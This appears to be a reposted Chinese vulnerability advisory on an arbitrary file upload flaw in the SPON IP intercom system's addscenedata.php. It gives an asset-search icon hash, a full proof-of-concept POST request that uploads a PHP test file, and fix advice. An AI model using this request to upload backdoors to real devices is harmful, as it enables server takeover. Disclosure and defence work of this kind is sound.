世邦通信 SPON IP网络对讲广播系统addscenedata.php任意文件上传漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/addscenedata.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
Accept-Encoding: gzip

------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="7788.php"
Content-Type: application/octet-stream

<?php echo 'ok';?>
------WebKitFormBoundary4LuoBRpTiVBo9cIQ--

访问上传文件地址

修复建议

1、升级到安全版本

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

相关推荐
EasyDSS2 小时前
视频监控从安装到优化的技术指南,视频汇聚系统EasyCVR智能安防系统构建之道
大数据·网络·网络协议·音视频
rufeike2 小时前
UDP协议理解
网络·网络协议·udp
江理不变情3 小时前
海思ISP调试记录
网络·接口隔离原则
世界尽头与你4 小时前
【安全扫描器原理】网络扫描算法
网络·安全
AI拉呱_4 小时前
医院行业等保2.0案例
安全·web安全
GKoSon4 小时前
加入RPC shell指令 温箱长时间监控
网络·网络协议·rpc
2301_810154555 小时前
纯真社区IP库离线版发布更新
web安全
hgdlip5 小时前
关闭IP属地显示会影响账号的正常使用吗
网络·网络协议·tcp/ip·ip属地
中云时代-防御可测试-小余5 小时前
高防IP是如何防护DDoS攻击和CC攻击的
运维·服务器·tcp/ip·安全·阿里云·ddos·宽度优先
Zz_waiting.5 小时前
网络原理 - 7(TCP - 4)
网络·网络协议·tcp/ip